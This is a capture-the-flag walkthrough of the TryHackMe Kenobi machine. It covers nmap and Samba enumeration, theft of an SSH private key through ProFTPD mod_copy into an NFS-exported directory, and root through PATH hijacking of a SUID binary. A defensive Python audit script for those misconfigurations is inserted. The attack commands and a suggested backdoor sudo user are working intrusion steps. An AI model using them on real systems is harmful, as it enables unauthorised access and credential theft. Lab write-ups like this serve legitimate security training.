1-Reconnaissance
{nmap -sT -sV 10.10.251.207}
· First port is FTP <21>: we check for anonymous login, and if it works we grab everything we can.
· Second port is SSH <22>: it can give you shell access with a password or an id_rsa file.
· Third one is HTTP <80>: Apache is installed, so the site may contain SQL injection or another web vulnerability.
· Fourth is rpcbind, a server that converts remote procedure call (RPC) program numbers into universal addresses.
· Fifth and sixth are Samba.
· Seventh is nfs_acl, an NFS share directory served through rpcbind.
2-Scanning and Enumeration
First we check Samba for any helpful files:
{smbclient -N -L //IP-here/}
We can check the anonymous share using this command:
{smbclient //10.10.251.207/anonymous}
As you see, we found log.txt and downloaded it. After reading the file we learned:
· The output generated for Kenobi when an SSH key was generated for the user.
· Information about the ProFTPD server.
Now our target is to get the SSH private key using ProFTPD. Let's scan:
{searchsploit ProFTPd 1.3.5}
As expected, we found mod_copy Command Execution. To exploit it we connect with netcat to the FTP port and then execute the commands.
Now we need to scan rpcbind to find out whether there's a shared directory we can access:
{nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.251.207}
We found /var exported to * (any host). That means everything under /var, including /var/tmp, is reachable.
We will copy the file we want into this directory, then mount the /var directory on our machine.
· First step: connect to FTP
{nc ip-here 21} *21 is the FTP port
· Then we use the mod_copy command execution we found in searchsploit:
SITE CPFR /home/Kenobi/.ssh/id_rsa *copy from this (the wanted file)
SITE CPTO /var/tmp/id_rsa *copy to this
Now we're going to mount /var on our computer using the mount command:
mkdir /root/Desktop/Kenobi (on the Desktop or anywhere you want)
mount ip-here:/var /root/Desktop/Kenobi *to mount /var
ls -la /root/Desktop/Kenobi
Now copy id_rsa to our system and use it to log into the Kenobi machine as that user:
{ssh -i id_rsa username@ip}
3-Privilege Escalation
We will use a SUID binary to escalate our privileges.
*For more info, see References.
First command: search for files with the SUID bit set, which run with their owner's privileges:
{find / -perm -u=s -type f 2>/dev/null}
(/usr/bin/menu) is an unusual file; let's try to use it.
· First, go to the tmp folder.
· Second, create a file named curl that launches a shell.
· Third, give execute permission to curl.
· Fourth, export the PATH so it starts with our folder.
· Fifth, run the file and check whether you got a shell.
· Last thing, check our permissions using the {id} command.
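From the defender's side, the chain above rests on three misconfigurations: an NFS export of /var open to any host, ProFTPD with mod_copy loaded, and a SUID binary (/usr/bin/menu) that is not part of the stock install. The following audit script is an added example, not part of the original writeup; the /etc/exports, proftpd.conf and find output it checks are constructed samples, and the SUID baseline is an assumed list taken from a known-good host.

```python
"""Audit the misconfigurations chained in the Kenobi room: world-exported NFS
shares, ProFTPD with mod_copy loaded, and SUID binaries outside a baseline.
All sample inputs are constructed for this example."""
import re

# Constructed /etc/exports: /var shared to every host without root_squash.
SAMPLE_EXPORTS = """\
# /etc/exports
/var *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/backup 10.10.0.0/24(ro,sync,root_squash)
"""

# Constructed proftpd.conf fragment (mod_copy enables SITE CPFR / SITE CPTO).
SAMPLE_PROFTPD = """\
ServerName "ProFTPD Default Installation"
LoadModule mod_copy.c
RequireValidShell off
"""

# Constructed output of: find / -perm -u=s -type f 2>/dev/null
SAMPLE_SUID = ["/usr/bin/sudo", "/usr/bin/passwd", "/bin/mount", "/usr/bin/menu"]
# Assumed baseline of SUID paths recorded from a known-good host of the same build.
SUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/bin/mount", "/bin/umount", "/usr/bin/su"}

# Matches "<path> <host>(<opts>)"; only the first host entry of a line is examined.
EXPORT_RE = re.compile(r"^(\S+)\s+([^\s(]+)\((.*)\)")


def audit_exports(text):
    """Return (path, reason) pairs for exports open to any host or lacking root_squash."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        path, host, opts = m.group(1), m.group(2), m.group(3).split(",")
        if host == "*":
            findings.append((path, "exported to all hosts"))
        if "no_root_squash" in opts:
            findings.append((path, "no_root_squash: remote root keeps uid 0"))
    return findings


def audit_proftpd(text):
    """Return True when mod_copy is loaded, i.e. SITE CPFR/CPTO are available."""
    return any(re.match(r"^\s*LoadModule\s+mod_copy\.c", l) for l in text.splitlines())


def audit_suid(paths, baseline):
    """Return SUID files that are not in the known-good baseline (e.g. /usr/bin/menu)."""
    return sorted(set(paths) - set(baseline))
```

On a real host, feed the script the contents of /etc/exports and proftpd.conf and the output of the find command above; each non-empty result is a finding worth fixing before the chain in this writeup can be used.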
4-Additional Move
Add a new user with sudo permission.
Text me for any correction. Eng. Saif
References
https://tryhackme.com/room/kenobi
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
http://www.proftpd.org/docs/contrib/mod_copy.html